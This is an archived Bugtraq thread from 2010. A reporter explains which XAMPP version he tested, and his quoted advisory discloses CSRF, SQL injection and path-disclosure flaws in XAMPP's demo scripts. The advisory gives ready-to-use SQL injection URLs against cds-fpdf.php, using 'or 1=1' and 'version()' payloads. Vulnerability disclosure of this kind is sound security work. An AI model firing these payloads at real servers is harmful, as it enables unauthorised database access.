lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <003601caa5d4$ff9f24f0$010000c0@ml>
Date: Thu, 4 Feb 2010 22:01:57 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <advisories@...ern0t.net>
Cc: <bugtraq@...urityfocus.com>
Subject: Re: Multiple vulnerabilities in XAMPP (advisory #7)

Hello MaXe!

> Have you checked the newest aka (also known as) latest version which is
> actually: 1.7.3 ?

No, I didn't and there was a reason for it. All these 7 advisories were made
in 2009 (as it clear from Timeline which I made for all advisories). Only
now I sent them to Bugtraq. And that time XAMPP 1.7.1 was the latest
version.

Besides, in 2009 developer of XAMPP answered me (with thanks) only at one of
seven letters and he didn't mention about fixing any of holes which I found.
So there is possibility that all or some of these holes are still not fixed.

I'm rarely sending advisories about vulnerabilities to Bugtraq. During
2007-2010 I sent only small amount of my advisories to Bugtraq. From the end
of 2006 I was sending all holes (http://securityvulns.ru/source15611.html)
which I found to securityvulns.ru (securityvulns.com) and 3APA3A, admin of
these sites, sometimes sent some of them to Bugtraq. Last month I drew
attention that he didn't write to Bugtraq about all these holes in XAMPP, so
I decided to write about them by myself :-).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: advisories@...ern0t.net
To: bugtraq@...urityfocus.com ; MustLive
Sent: Monday, February 01, 2010 10:53 AM
Subject: Re: Multiple vulnerabilities in XAMPP (advisory #7)


Hi MustLive

Have you checked the newest aka (also known as) latest version which is
actually: 1.7.3 ?

Link: http://www.apachefriends.org/en/xampp-windows.html


Best regards,
MaXe

On January 28, 2010 at 11:55 PM MustLive <mustlive@...security.com.ua>
wrote:

> Hello Bugtraq!
>
> I am continue informing you about multiple vulnerabilities in XAMPP.
>
> -----------------------------
> Advisory #7
> -----------------------------
> CSRF, SQL Injection and Full path disclosure vulnerabilities in XAMPP
> -----------------------------
> URL: http://websecurity.com.ua/3285/
> -----------------------------
> Timeline:
>
> 27.06.2009 - found the vulnerabilities.
> 01.07.2009 - announced at my site.
> 02.07.2009 - informed developers.
> 08.08.2009 - disclosed at my site.
> -----------------------------
> Details:
>
> These are Cross-Site Request Forgery, SQL Injection and Full path
> disclosure
> vulnerabilities.
>
> CSRF:
>
> http://site/xampp/cds-fpdf.php
>
> It's possible to delete or add data in test table (as via CSRF, and as via
> Insufficient Authorization vulnerabilities). And also to conduct SQL
> Injection via CSRF attacks.
>
> SQL Injection:
>
> http://site/xampp/cds-fpdf.php?action=del&id=-1%20or%201=1 (register
> globals
> on)
>
> http://site/xampp/cds-fpdf.php?interpret=1&titel=1&jahr=1),(version(),1,1
>
> http://site/xampp/cds-fpdf.php?interpret=1&titel=',1,1),(version(),1,1)/*
> (mq off)
>
> http://site/xampp/cds-fpdf.php?titel=1&interpret=',1),(version(),1,1)/*
> (mq
> off)
>
> Attack is possible during access to admin panel (via Insufficient
> Authorization), or via CSRF.
>
> Full path disclosure:
>
> http://site/xampp/external/ps/draw.php
> http://site/xampp/external/ps/hyperlinks.php
> http://site/xampp/external/ps/image.php
> http://site/xampp/external/ps/overprint.php
> http://site/xampp/external/ps/ps.php?submit=OK
> http://site/xampp/external/ps/shading.php
> http://site/xampp/external/ps/spotcolor.php
> http://site/xampp/external/ps/text.php
> http://site/xampp/special/ps/draw.php
> http://site/xampp/special/ps/hyperlinks.php
> http://site/xampp/special/ps/image.php
> http://site/xampp/special/ps/overprint.php
> http://site/xampp/special/ps/ps.php?submit=OK
> http://site/xampp/special/ps/shading.php
> http://site/xampp/special/ps/spotcolor.php
> http://site/xampp/special/ps/text.php
>
> Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
> versions (including last version XAMPP 1.7.1).
>
> -----------------------------
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ